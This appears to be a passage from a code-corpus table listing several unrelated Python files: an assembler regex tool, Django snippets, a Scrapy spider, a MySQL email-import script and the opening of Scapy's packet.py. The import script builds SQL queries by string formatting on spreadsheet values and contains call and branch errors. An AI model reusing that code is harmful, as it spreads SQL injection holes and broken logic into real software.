blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 213 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 246 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b318240301cd14d68a20b64b9a2d2306f58edadf | ad78b8a8e22445bbc517749ee594a805eea9729f | /tools/PyAsm.py | 7df05409ed05f3b5f524e0043b6f1bee71840d29 | [] | no_license | fbrosser/DSP48E1-FP | 8d15ce40eb1d6fef976bdc90866b8a406d50e2b1 | 3bee71d52cc6ca4c421a43731d903420ed930a9d | refs/heads/master | 2021-05-26T17:25:02.898937 | 2013-03-29T06:41:50 | 2013-03-29T06:41:50 | 5,396,713 | 19 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,743 | py | ### Python reading and matching from assembler source file
### Fredrik Brosser 2012-11-14
# Import regular expressions library
# (Overkill to use here, but includes powerful features for more advanced use)
import re
# File to be read and variables
fileName = "test.asm"
SPoffset = "No offset found"
# Array of register names as str (remember, python is untyped!)
registers = ['v0', 'v1', 'v2', 'v3', 'v4', 'v5']
usedRegisters = []
unusedRegisters = []
# Read line by line in file, stripping the newline character
lines = [line.strip() for line in open(fileName)]
# Pick stack pointer offset from first line that matches
for l in lines:
# Note: this pattern is overly generic (for whitespace)
m = re.match('\s?' + 'addiu' + '\s?' + 'sp'+ '\s?' + ',' + '\s?' + 'sp' + '\s?' + ',' + '\s?' + '(-{0,1}\d+)', l)
if m:
# Pick out content of first bracket subgroup
SPoffset = m.group(1)
break
# Look for usage of registers as specified in the registers array
for l in lines:
for i in range(len(registers)):
m = re.search(registers[i], l)
if m:
usedRegisters.append(registers[i])
# Sort registers and remove duplicate entries
usedRegisters = sorted(set(usedRegisters))
# Check for unused registers
unusedRegisters = [r for r in registers if r not in usedRegisters]
# Sort registers and remove duplicate entries
unusedRegisters = sorted(set(unusedRegisters))
# Print results
print "\n ***** Raw assembler program ***** \n"
for l in lines:
print l
print "\n ***** Stack pointer offset *****"
print SPoffset
print "\n ***** Used registers *****"
for r in usedRegisters:
print r
print "\n ***** Unsed registers *****"
for r in unusedRegisters:
print r
print ""
| [
"fb.msngr@gmail.com"
] | fb.msngr@gmail.com |
ce733cff00e5fc475a5c89434671f080addcdf37 | c36b0d629ef5ad6242966de7142094c9164ada5b | /trackself/tests.py | dd1eb5f2b8a7cd05dd445b8c49451eeea499cd65 | [] | no_license | fingerecho/trackingsite | 039f340d845759d50effb7f0270b587c2897085d | fad56ba8b31233536117339a70a25617b18fe853 | refs/heads/master | 2020-04-08T01:43:39.023302 | 2018-11-24T06:03:23 | 2018-11-24T06:03:23 | 158,907,263 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 424 | py | from django.test import TestCase
# Create your tests here.
"""
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Cache-Control: Private
Connection: keep-alive
Content-Length: 47
Content-Security-Policy: script-src gitee.fyping.cn:65533 https://fingerecho.gitee.io
Content-Type: application/javascript
Date: Sat, 24 Nov 2018 03:17:29 GMT
Server: nginx/1.12.2
""" | [
"m13001282105@163.com"
] | m13001282105@163.com |
186e8ba7e922e66bf52aec6dd413f716dd491b2b | 8a44eecda3f57ff1f7a412d1f47c19d59d65cac5 | /realtors/admin.py | 709f0f1502ca2d0c8e57c0fa0b7d4ddeecfa25ef | [] | no_license | KalashMaskey/Python-btre-project | 15b14f2e72e9ec2ef143f9c2057ae7bb42548f1e | 41bf6dd1f1cdd18c5a43dc283c090413dd07a80d | refs/heads/master | 2022-10-20T16:10:19.890918 | 2020-07-03T08:00:45 | 2020-07-03T08:00:45 | 275,541,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | from django.contrib import admin
from .models import Realtor
class RealtorAdmin(admin.ModelAdmin):
list_display =('id','name','email','hire_date')
list_display_links = ('id','name')
search_fields = ('name',)
list_per_page = 25
admin.site.register(Realtor,RealtorAdmin)
| [
"kalashm24@gmail.com"
] | kalashm24@gmail.com |
83144e3be32adf441af293dfb34a17220026af02 | c6bda9ed39fb1a121a85d8822ea8c3a8d84de64a | /danskebanklu/spiders/spider.py | b6c5d76df9578414d0d81933ca95eeb95a5939ec | [] | no_license | hristo-grudev/danskebanklu | 9e337b58767c8f40bfffaf54ddc373323dfc71ab | 9aa261464953e74ee258b63ff134983bce4760f7 | refs/heads/main | 2023-03-05T12:16:36.538807 | 2021-02-18T07:32:55 | 2021-02-18T07:32:55 | 339,970,414 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,021 | py | import scrapy
from scrapy.loader import ItemLoader
from ..items import DanskebankluItem
from itemloaders.processors import TakeFirst
class DanskebankluSpider(scrapy.Spider):
name = 'danskebanklu'
start_urls = ['https://danskebank.lu/private-banking/news']
def parse(self, response):
post_links = response.xpath('//li[@class="overview-item"]/a/@href').getall()
yield from response.follow_all(post_links, self.parse_post)
def parse_post(self, response):
title = response.xpath('//h1/text()').get()
description = response.xpath('//div[@class="row article-body"]//text()[normalize-space()]').getall()
description = [p.strip() for p in description]
description = ' '.join(description).strip()
date = response.xpath('//div[@class="meta"]/span/text()').get()
item = ItemLoader(item=DanskebankluItem(), response=response)
item.default_output_processor = TakeFirst()
item.add_value('title', title)
item.add_value('description', description)
item.add_value('date', date)
return item.load_item() | [
"hr.grudev@gmail.com"
] | hr.grudev@gmail.com |
b676e3454df9fe014b0719b5ddf0092f3da82393 | 1a8e44a757c2ca1a1cce6a7dfd73b7152e9e5970 | /basis_email.py | 49562fef1edbae3876e1240bc4299bcc975c6240 | [] | no_license | sarwarsikder/import_xlsx_pandas | c75095964718430168755c1188d61eec763a267e | e41fc3b98f2f90f750602ced61677f982fe60be5 | refs/heads/master | 2022-10-14T06:43:42.672750 | 2020-03-03T07:27:40 | 2020-03-03T07:27:40 | 244,541,070 | 1 | 0 | null | 2022-06-22T01:19:55 | 2020-03-03T04:25:49 | Python | UTF-8 | Python | false | false | 3,779 | py | import mysql.connector
import pandas as pds
import datetime as date_time
import re
db_con = mysql.connector.connect(
host="localhost",
user="root",
password="password",
database="pick_email"
)
cursor_connection = db_con.cursor()
sql_transaction = []
# Define a function for
# for validating an Email
def email_checker(email):
# pass the regualar expression
# and the string in search() method
regex = '^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$'
if (re.search(regex, email)):
return True
else:
return False
def transaction_bldr(sql):
global sql_transaction
sql_transaction.append(sql)
# print(sql)
if len(sql_transaction) > 100:
db_con.execute('BEGIN TRANSACTION')
for s in sql_transaction:
try:
db_con.execute(s)
except:
pass
cursor_connection.commit()
sql_transaction = []
def find_existing_phone_number(email):
try:
sql = "SELECT email FROM email_collection WHERE email LIKE '{}' LIMIT 1".format(
'%' + email + '%')
# print(sql)
cursor_connection.execute(sql)
result = cursor_connection.fetchone()
if result != None:
return result[0]
else:
return False
except Exception as e:
print(str(e))
return False
def insert_email_number(email, date, create_by):
try:
if email_checker(email):
sql = """INSERT INTO email_collection ( email , created_by) VALUES ("{}","{}");""".format(
email, create_by)
# print(sql)
cursor_connection.execute(sql)
db_con.commit()
except Exception as e:
print('s0 insertion', str(e))
if __name__ == '__main__':
# pd__data_obj = pds.read_excel('ovi.xlsx')
pd__data_obj = pds.read_excel('Assciations.xlsx',
sheet_name='BAIRA',
converters={'Email': str})
pd_data_value = pds.DataFrame(pd__data_obj, columns=['Email']).dropna()
for target_item in pd_data_value.index:
email = str(pd_data_value['Email'][target_item]).strip()
created_by = "Assciations--BAIRA"
if "," in email:
seg_phones = email.split(",")
for item in seg_phones:
print(item)
print("------>>>>>>>>-------")
insert_email_number(item, str('25-02-2020'), created_by)
# if find_existing_phone_number(item):
# print(item)
# insert_email_number(item, str('25-02-2020'), created_by)
elif ";" in email:
seg_phones = email.split(";")
for item in seg_phones:
print(item)
print("------>>>>>>>>-------")
insert_email_number(item, str('25-02-2020'), created_by)
# if find_existing_phone_number(item):
# print(item)
# insert_email_number(item, str('25-02-2020'), created_by)
elif ";" in email:
seg_phones = email.split(" ")
for item in seg_phones:
print(item)
print("------>>>>>>>>-------")
insert_email_number(item, str('25-02-2020'), created_by)
# if find_existing_phone_number(item):
# print(item)
# insert_email_number(item, str('25-02-2020'), created_by)
else:
print(email)
insert_email_number(email, str('25-02-2020'), created_by)
# if find_existing_phone_number(email):
# print(email)
# insert_email_number(email, str('25-02-2020'), created_by)
| [
"sarwar@workspaceit.com"
] | sarwar@workspaceit.com |
ad6ec079550e0235bcea5e8350130e7a74d839f5 | 81ef1b1d100041d28a8af9c1f153eed2e3c9c3e5 | /joecceasy/ReferencesAndExamplesOfCode.py | 836f45668bb576058279d743d58771d51387b7b5 | [
"MIT"
] | permissive | joetainment/joecceasy | 8f605d20f543d162adc56cb5cb23ce8f45f56553 | be300a6c30bcc1e09e7b2c3561fd2ab13836396b | refs/heads/master | 2022-02-24T03:37:06.254731 | 2022-02-10T15:00:48 | 2022-02-10T15:00:48 | 251,486,462 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py |
class ExampleClass01Meta(type):
## __setattr__ and __getattr__ can potentially cause issues
## such as recursions (they introduce serious complexity)
'''
def __setattr__(cls, key, val ):
if key=='P':
print( val )
#else:
# setattr( cls, key, val) ## recursion issues
''' | [
"joecceasy@joetainment.com"
] | joecceasy@joetainment.com |
bf362dc62e8492e1c8bc63a7995980c16df7f4fd | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /HpqLxNqqRvMQoz8ME_16.py | d81164152044bf439087a06dc09c07b9ce593cce | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | """
Create a function that takes a string and returns a string in which each
character is repeated once.
### Examples
double_char("String") ➞ "SSttrriinngg"
double_char("Hello World!") ➞ "HHeelllloo WWoorrlldd!!"
double_char("1234!_ ") ➞ "11223344!!__ "
### Notes
All test cases contain valid strings. Don't worry about spaces, special
characters or numbers. They're all considered valid characters.
"""
double_char=lambda s:"".join(c*2 for c in s)
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
9004a92c13e158c5c29a871a47308f4db2a9c0c9 | 372dbfdc84975cb1ab675f41e1c197e4e90ff878 | /backend/device_registry/migrations/0028_auto_20190511_0723.py | 04ebac94b48ae075a9d8dd430b9b13a64b6b7061 | [
"MIT"
] | permissive | a-martynovich/api | 3fcd45ff9bfa07cb8a3c47b4c55365c5133cd071 | 702254c48677cf5a6f2fe298bced854299868eef | refs/heads/master | 2023-02-16T06:16:53.623613 | 2020-11-18T10:49:55 | 2020-11-18T10:49:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 438 | py | # Generated by Django 2.1.7 on 2019-05-11 07:23
from django.db import migrations
from django.contrib.postgres.fields import JSONField
class Migration(migrations.Migration):
dependencies = [
('device_registry', '0027_auto_20190509_0516'),
]
operations = [
migrations.AlterField(
model_name='portscan',
name='block_ports',
field=JSONField(default=list),
),
]
| [
"pythonpro@gmail.com"
] | pythonpro@gmail.com |
b5ed4e6260b24335bf7015ee07fd28da69d6e0a9 | 47e15487e41120a4ef3adffa738cbc165c2172fc | /venv/pythonInterpreter/lib/python3.9/site-packages/scapy/packet.py | d656ac55aa0120973a08973d22c644f94bda6bca | [] | no_license | TjTheGeek/Pene-Test | 01bf532f61a4dd6ec2745ceedf1f2c4253a168b1 | d1d8c2499a5b1102fbd049ac1dc499a0156dafc0 | refs/heads/master | 2023-06-30T22:50:40.628209 | 2021-08-03T12:52:59 | 2021-08-03T12:52:59 | 367,958,884 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93,706 | py | # This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Philippe Biondi <phil@secdev.org>
# This program is published under a GPLv2 license
"""
Packet class
Provides:
- the default Packet classes
- binding mechanisms
- fuzz() method
- exploration methods: explore() / ls()
"""
from __future__ import absolute_import
from __future__ import print_function
from collections import defaultdict
import re
import time
import itertools
import copy
import types
import warnings
from scapy.fields import (
AnyField,
BitField,
ConditionalField,
Emph,
EnumField,
Field,
FlagsField,
MultiEnumField,
MultipleTypeField,
PacketListField,
RawVal,
StrField,
)
from scapy.config import conf, _version_checker
from scapy.compat import raw, orb, bytes_encode
from scapy.base_classes import BasePacket, Gen, SetGen, Packet_metaclass, \
_CanvasDumpExtended
from scapy.interfaces import _GlobInterfaceType
from scapy.volatile import RandField, VolatileValue
from scapy.utils import import_hexcap, tex_escape, colgen, issubtype, \
pretty_list, EDecimal
from scapy.error import Scapy_Exception, log_runtime, warning
from scapy.extlib import PYX
import scapy.modules.six as six
# Typing imports
from scapy.compat import (
Any,
Callable,
Dict,
Iterator,
List,
NoReturn,
Optional,
Set,
Tuple,
Type,
TypeVar,
Union,
Sequence,
cast,
)
try:
import pyx
except ImportError:
pass
_T = TypeVar("_T", Dict[str, Any], Optional[Dict[str, Any]])
# six.with_metaclass typing is glitchy
class Packet(six.with_metaclass(Packet_metaclass, # type: ignore
BasePacket, _CanvasDumpExtended)):
__slots__ = [
"time", "sent_time", "name",
"default_fields", "fields", "fieldtype",
"overload_fields", "overloaded_fields",
"packetfields",
"original", "explicit", "raw_packet_cache",
"raw_packet_cache_fields", "_pkt", "post_transforms",
# then payload and underlayer
"payload", "underlayer",
"name",
# used for sr()
"_answered",
# used when sniffing
"direction", "sniffed_on",
# handle snaplen Vs real length
"wirelen",
]
name = None
fields_desc = [] # type: Sequence[AnyField]
deprecated_fields = {} # type: Dict[str, Tuple[str, str]]
overload_fields = {} # type: Dict[Type[Packet], Dict[str, Any]]
payload_guess = [] # type: List[Tuple[Dict[str, Any], Type[Packet]]]
show_indent = 1
show_summary = True
match_subclass = False
class_dont_cache = {} # type: Dict[Type[Packet], bool]
class_packetfields = {} # type: Dict[Type[Packet], Any]
class_default_fields = {} # type: Dict[Type[Packet], Dict[str, Any]]
class_default_fields_ref = {} # type: Dict[Type[Packet], List[str]]
class_fieldtype = {} # type: Dict[Type[Packet], Dict[str, AnyField]] # noqa: E501
@classmethod
def from_hexcap(cls):
# type: (Type[Packet]) -> Packet
return cls(import_hexcap())
@classmethod
def upper_bonds(self):
# type: () -> None
for fval, upper in self.payload_guess:
print("%-20s %s" % (upper.__name__, ", ".join("%-12s" % ("%s=%r" % i) for i in six.iteritems(fval)))) # noqa: E501
@classmethod
def lower_bonds(self):
# type: () -> None
for lower, fval in six.iteritems(self._overload_fields):
print("%-20s %s" % (lower.__name__, ", ".join("%-12s" % ("%s=%r" % i) for i in six.iteritems(fval)))) # noqa: E501
def __init__(self,
_pkt=b"", # type: bytes
post_transform=None, # type: Any
_internal=0, # type: int
_underlayer=None, # type: Optional[Packet]
**fields # type: Any
):
# type: (...) -> None
self.time = time.time() # type: Union[EDecimal, float]
self.sent_time = None # type: Union[EDecimal, float, None]
self.name = (self.__class__.__name__
if self._name is None else
self._name)
self.default_fields = {} # type: Dict[str, Any]
self.overload_fields = self._overload_fields
self.overloaded_fields = {} # type: Dict[str, Any]
self.fields = {} # type: Dict[str, Any]
self.fieldtype = {} # type: Dict[str, AnyField]
self.packetfields = [] # type: List[AnyField]
self.payload = NoPayload()
self.init_fields()
self.underlayer = _underlayer
self.original = _pkt
self.explicit = 0
self.raw_packet_cache = None # type: Optional[bytes]
self.raw_packet_cache_fields = None # type: Optional[Dict[str, Any]] # noqa: E501
self.wirelen = None # type: Optional[int]
self.direction = None # type: Optional[int]
self.sniffed_on = None # type: Optional[_GlobInterfaceType]
if _pkt:
self.dissect(_pkt)
if not _internal:
self.dissection_done(self)
# We use this strange initialization so that the fields
# are initialized in their declaration order.
# It is required to always support MultipleTypeField
for field in self.fields_desc:
fname = field.name
try:
value = fields.pop(fname)
except KeyError:
continue
self.fields[fname] = self.get_field(fname).any2i(self, value)
# The remaining fields are unknown
for fname in fields:
if fname in self.deprecated_fields:
# Resolve deprecated fields
value = fields[fname]
fname = self._resolve_alias(fname)
self.fields[fname] = self.get_field(fname).any2i(self, value)
continue
raise AttributeError(fname)
if isinstance(post_transform, list):
self.post_transforms = post_transform
elif post_transform is None:
self.post_transforms = []
else:
self.post_transforms = [post_transform]
_PickleType = Tuple[
Union[EDecimal, float],
Optional[Union[EDecimal, float, None]],
Optional[int],
Optional[_GlobInterfaceType],
Optional[int]
]
def __reduce__(self):
# type: () -> Tuple[Type[Packet], Tuple[bytes], Packet._PickleType]
"""Used by pickling methods"""
return (self.__class__, (self.build(),), (
self.time,
self.sent_time,
self.direction,
self.sniffed_on,
self.wirelen,
))
def __setstate__(self, state):
# type: (Packet._PickleType) -> Packet
"""Rebuild state using pickable methods"""
self.time = state[0]
self.sent_time = state[1]
self.direction = state[2]
self.sniffed_on = state[3]
self.wirelen = state[4]
return self
def __deepcopy__(self,
memo, # type: Any
):
# type: (...) -> Packet
"""Used by copy.deepcopy"""
return self.copy()
def init_fields(self):
# type: () -> None
"""
Initialize each fields of the fields_desc dict
"""
if self.class_dont_cache.get(self.__class__, False):
self.do_init_fields(self.fields_desc)
else:
self.do_init_cached_fields()
def do_init_fields(self,
flist, # type: Sequence[AnyField]
):
# type: (...) -> None
"""
Initialize each fields of the fields_desc dict
"""
default_fields = {}
for f in flist:
default_fields[f.name] = copy.deepcopy(f.default)
self.fieldtype[f.name] = f
if f.holds_packets:
self.packetfields.append(f)
# We set default_fields last to avoid race issues
self.default_fields = default_fields
def do_init_cached_fields(self):
# type: () -> None
"""
Initialize each fields of the fields_desc dict, or use the cached
fields information
"""
cls_name = self.__class__
# Build the fields information
if Packet.class_default_fields.get(cls_name, None) is None:
self.prepare_cached_fields(self.fields_desc)
# Use fields information from cache
default_fields = Packet.class_default_fields.get(cls_name, None)
if default_fields:
self.default_fields = default_fields
self.fieldtype = Packet.class_fieldtype[cls_name]
self.packetfields = Packet.class_packetfields[cls_name]
# Deepcopy default references
for fname in Packet.class_default_fields_ref[cls_name]:
value = self.default_fields[fname]
try:
self.fields[fname] = value.copy()
except AttributeError:
# Python 2.7 - list only
self.fields[fname] = value[:]
def prepare_cached_fields(self, flist):
# type: (Sequence[AnyField]) -> None
"""
Prepare the cached fields of the fields_desc dict
"""
cls_name = self.__class__
# Fields cache initialization
if not flist:
return
class_default_fields = dict()
class_default_fields_ref = list()
class_fieldtype = dict()
class_packetfields = list()
# Fields initialization
for f in flist:
if isinstance(f, MultipleTypeField):
# Abort
self.class_dont_cache[cls_name] = True
self.do_init_fields(self.fields_desc)
return
tmp_copy = copy.deepcopy(f.default)
class_default_fields[f.name] = tmp_copy
class_fieldtype[f.name] = f
if f.holds_packets:
class_packetfields.append(f)
# Remember references
if isinstance(f.default, (list, dict, set, RandField, Packet)):
class_default_fields_ref.append(f.name)
# Apply
Packet.class_default_fields_ref[cls_name] = class_default_fields_ref
Packet.class_fieldtype[cls_name] = class_fieldtype
Packet.class_packetfields[cls_name] = class_packetfields
# Last to avoid racing issues
Packet.class_default_fields[cls_name] = class_default_fields
def dissection_done(self, pkt):
# type: (Packet) -> None
"""DEV: will be called after a dissection is completed"""
self.post_dissection(pkt)
self.payload.dissection_done(pkt)
def post_dissection(self, pkt):
# type: (Packet) -> None
"""DEV: is called after the dissection of the whole packet"""
pass
def get_field(self, fld):
# type: (str) -> AnyField
"""DEV: returns the field instance from the name of the field"""
return self.fieldtype[fld]
def add_payload(self, payload):
# type: (Union[Packet, bytes]) -> None
if payload is None:
return
elif not isinstance(self.payload, NoPayload):
self.payload.add_payload(payload)
else:
if isinstance(payload, Packet):
self.payload = payload
payload.add_underlayer(self)
for t in self.aliastypes:
if t in payload.overload_fields:
self.overloaded_fields = payload.overload_fields[t]
break
elif isinstance(payload, (bytes, str, bytearray, memoryview)):
self.payload = conf.raw_layer(load=bytes_encode(payload))
else:
raise TypeError("payload must be 'Packet', 'bytes', 'str', 'bytearray', or 'memoryview', not [%s]" % repr(payload)) # noqa: E501
def remove_payload(self):
# type: () -> None
self.payload.remove_underlayer(self)
self.payload = NoPayload()
self.overloaded_fields = {}
def add_underlayer(self, underlayer):
# type: (Packet) -> None
self.underlayer = underlayer
def remove_underlayer(self, other):
# type: (Packet) -> None
self.underlayer = None
def copy(self):
# type: () -> Packet
"""Returns a deep copy of the instance."""
clone = self.__class__()
clone.fields = self.copy_fields_dict(self.fields)
clone.default_fields = self.copy_fields_dict(self.default_fields)
clone.overloaded_fields = self.overloaded_fields.copy()
clone.underlayer = self.underlayer
clone.explicit = self.explicit
clone.raw_packet_cache = self.raw_packet_cache
clone.raw_packet_cache_fields = self.copy_fields_dict(
self.raw_packet_cache_fields
)
clone.wirelen = self.wirelen
clone.post_transforms = self.post_transforms[:]
clone.payload = self.payload.copy()
clone.payload.add_underlayer(clone)
clone.time = self.time
return clone
def _resolve_alias(self, attr):
# type: (str) -> str
new_attr, version = self.deprecated_fields[attr]
warnings.warn(
"%s has been deprecated in favor of %s since %s !" % (
attr, new_attr, version
), DeprecationWarning
)
return new_attr
def getfieldval(self, attr):
# type: (str) -> Any
if self.deprecated_fields and attr in self.deprecated_fields:
attr = self._resolve_alias(attr)
if attr in self.fields:
return self.fields[attr]
if attr in self.overloaded_fields:
return self.overloaded_fields[attr]
if attr in self.default_fields:
return self.default_fields[attr]
return self.payload.getfieldval(attr)
def getfield_and_val(self, attr):
# type: (str) -> Tuple[AnyField, Any]
if self.deprecated_fields and attr in self.deprecated_fields:
attr = self._resolve_alias(attr)
if attr in self.fields:
return self.get_field(attr), self.fields[attr]
if attr in self.overloaded_fields:
return self.get_field(attr), self.overloaded_fields[attr]
if attr in self.default_fields:
return self.get_field(attr), self.default_fields[attr]
raise ValueError
def __getattr__(self, attr):
# type: (str) -> Any
try:
fld, v = self.getfield_and_val(attr)
except ValueError:
return self.payload.__getattr__(attr)
if fld is not None:
return fld.i2h(self, v)
return v
def setfieldval(self, attr, val):
# type: (str, Any) -> None
if self.deprecated_fields and attr in self.deprecated_fields:
attr = self._resolve_alias(attr)
if attr in self.default_fields:
fld = self.get_field(attr)
if fld is None:
any2i = lambda x, y: y # type: Callable[..., Any]
else:
any2i = fld.any2i
self.fields[attr] = any2i(self, val)
self.explicit = 0
self.raw_packet_cache = None
self.raw_packet_cache_fields = None
self.wirelen = None
elif attr == "payload":
self.remove_payload()
self.add_payload(val)
else:
self.payload.setfieldval(attr, val)
def __setattr__(self, attr, val):
# type: (str, Any) -> None
if attr in self.__all_slots__:
if attr == "sent_time":
self.update_sent_time(val)
return object.__setattr__(self, attr, val)
try:
return self.setfieldval(attr, val)
except AttributeError:
pass
return object.__setattr__(self, attr, val)
def delfieldval(self, attr):
# type: (str) -> None
if attr in self.fields:
del(self.fields[attr])
self.explicit = 0 # in case a default value must be explicit
self.raw_packet_cache = None
self.raw_packet_cache_fields = None
self.wirelen = None
elif attr in self.default_fields:
pass
elif attr == "payload":
self.remove_payload()
else:
self.payload.delfieldval(attr)
def __delattr__(self, attr):
# type: (str) -> None
if attr == "payload":
return self.remove_payload()
if attr in self.__all_slots__:
return object.__delattr__(self, attr)
try:
return self.delfieldval(attr)
except AttributeError:
pass
return object.__delattr__(self, attr)
def _superdir(self):
# type: () -> Set[str]
"""
Return a list of slots and methods, including those from subclasses.
"""
attrs = set()
cls = self.__class__
if hasattr(cls, '__all_slots__'):
attrs.update(cls.__all_slots__)
for bcls in cls.__mro__:
if hasattr(bcls, '__dict__'):
attrs.update(bcls.__dict__)
return attrs
def __dir__(self):
# type: () -> List[str]
"""
Add fields to tab completion list.
"""
return sorted(itertools.chain(self._superdir(), self.default_fields))
def __repr__(self):
# type: () -> str
s = ""
ct = conf.color_theme
for f in self.fields_desc:
if isinstance(f, ConditionalField) and not f._evalcond(self):
continue
if f.name in self.fields:
fval = self.fields[f.name]
if isinstance(fval, (list, dict, set)) and len(fval) == 0:
continue
val = f.i2repr(self, fval)
elif f.name in self.overloaded_fields:
fover = self.overloaded_fields[f.name]
if isinstance(fover, (list, dict, set)) and len(fover) == 0:
continue
val = f.i2repr(self, fover)
else:
continue
if isinstance(f, Emph) or f in conf.emph:
ncol = ct.emph_field_name
vcol = ct.emph_field_value
else:
ncol = ct.field_name
vcol = ct.field_value
s += " %s%s%s" % (ncol(f.name),
ct.punct("="),
vcol(val))
return "%s%s %s %s%s%s" % (ct.punct("<"),
ct.layer_name(self.__class__.__name__),
s,
ct.punct("|"),
repr(self.payload),
ct.punct(">"))
if six.PY2:
def __str__(self):
# type: () -> str
return self.build()
else:
def __str__(self):
# type: () -> str
return str(self.build())
def __bytes__(self):
# type: () -> bytes
return self.build()
def __div__(self, other):
# type: (Any) -> Packet
if isinstance(other, Packet):
cloneA = self.copy()
cloneB = other.copy()
cloneA.add_payload(cloneB)
return cloneA
elif isinstance(other, (bytes, str, bytearray, memoryview)):
return self / conf.raw_layer(load=bytes_encode(other))
else:
return other.__rdiv__(self) # type: ignore
__truediv__ = __div__
def __rdiv__(self, other):
# type: (Any) -> Packet
if isinstance(other, (bytes, str, bytearray, memoryview)):
return conf.raw_layer(load=bytes_encode(other)) / self
else:
raise TypeError
__rtruediv__ = __rdiv__
def __mul__(self, other):
# type: (Any) -> List[Packet]
if isinstance(other, int):
return [self] * other
else:
raise TypeError
def __rmul__(self, other):
# type: (Any) -> List[Packet]
return self.__mul__(other)
def __nonzero__(self):
# type: () -> bool
return True
__bool__ = __nonzero__
def __len__(self):
# type: () -> int
return len(self.__bytes__())
def copy_field_value(self, fieldname, value):
# type: (str, Any) -> Any
return self.get_field(fieldname).do_copy(value)
def copy_fields_dict(self, fields):
# type: (_T) -> _T
if fields is None:
return None
return {fname: self.copy_field_value(fname, fval)
for fname, fval in six.iteritems(fields)}
def clear_cache(self):
# type: () -> None
"""Clear the raw packet cache for the field and all its subfields"""
self.raw_packet_cache = None
for fld, fval in six.iteritems(self.fields):
fld = self.get_field(fld)
if fld.holds_packets:
if isinstance(fval, Packet):
fval.clear_cache()
elif isinstance(fval, list):
for fsubval in fval:
fsubval.clear_cache()
self.payload.clear_cache()
def self_build(self):
# type: () -> bytes
"""
Create the default layer regarding fields_desc dict
:param field_pos_list:
"""
if self.raw_packet_cache is not None:
for fname, fval in six.iteritems(self.raw_packet_cache_fields):
if self.getfieldval(fname) != fval:
self.raw_packet_cache = None
self.raw_packet_cache_fields = None
self.wirelen = None
break
if self.raw_packet_cache is not None:
return self.raw_packet_cache
p = b""
for f in self.fields_desc:
val = self.getfieldval(f.name)
if isinstance(val, RawVal):
p += bytes(val)
else:
p = f.addfield(self, p, val)
return p
def do_build_payload(self):
# type: () -> bytes
"""
Create the default version of the payload layer
:return: a string of payload layer
"""
return self.payload.do_build()
def do_build(self):
# type: () -> bytes
"""
Create the default version of the layer
:return: a string of the packet with the payload
"""
if not self.explicit:
self = next(iter(self))
pkt = self.self_build()
for t in self.post_transforms:
pkt = t(pkt)
pay = self.do_build_payload()
if self.raw_packet_cache is None:
return self.post_build(pkt, pay)
else:
return pkt + pay
def build_padding(self):
# type: () -> bytes
return self.payload.build_padding()
def build(self):
# type: () -> bytes
"""
Create the current layer
:return: string of the packet with the payload
"""
p = self.do_build()
p += self.build_padding()
p = self.build_done(p)
return p
def post_build(self, pkt, pay):
# type: (bytes, bytes) -> bytes
"""
DEV: called right after the current layer is build.
:param str pkt: the current packet (build by self_buil function)
:param str pay: the packet payload (build by do_build_payload function)
:return: a string of the packet with the payload
"""
return pkt + pay
def build_done(self, p):
# type: (bytes) -> bytes
return self.payload.build_done(p)
def do_build_ps(self):
# type: () -> Tuple[bytes, List[Tuple[Packet, List[Tuple[Field[Any, Any], str, bytes]]]]] # noqa: E501
p = b""
pl = []
q = b""
for f in self.fields_desc:
if isinstance(f, ConditionalField) and not f._evalcond(self):
continue
p = f.addfield(self, p, self.getfieldval(f.name))
if isinstance(p, bytes):
r = p[len(q):]
q = p
else:
r = b""
pl.append((f, f.i2repr(self, self.getfieldval(f.name)), r))
pkt, lst = self.payload.build_ps(internal=1)
p += pkt
lst.append((self, pl))
return p, lst
def build_ps(self, internal=0):
# type: (int) -> Tuple[bytes, List[Tuple[Packet, List[Tuple[Any, Any, bytes]]]]] # noqa: E501
p, lst = self.do_build_ps()
# if not internal:
# pkt = self
# while pkt.haslayer(conf.padding_layer):
# pkt = pkt.getlayer(conf.padding_layer)
# lst.append( (pkt, [ ("loakjkjd", pkt.load, pkt.load) ] ) )
# p += pkt.load
# pkt = pkt.payload
return p, lst
def canvas_dump(self, layer_shift=0, rebuild=1):
    # type: (int, int) -> pyx.canvas.canvas
    """Render the packet as a PyX canvas: per-layer field table on the
    left, the corresponding hex dump on the right, with arrows linking
    field values to their bytes. Requires the optional PyX dependency.
    :param layer_shift: vertical offset added to the dump after each layer
    :param rebuild: if true, rebuild the packet first so computed fields
        (checksums, lengths) appear with their final values
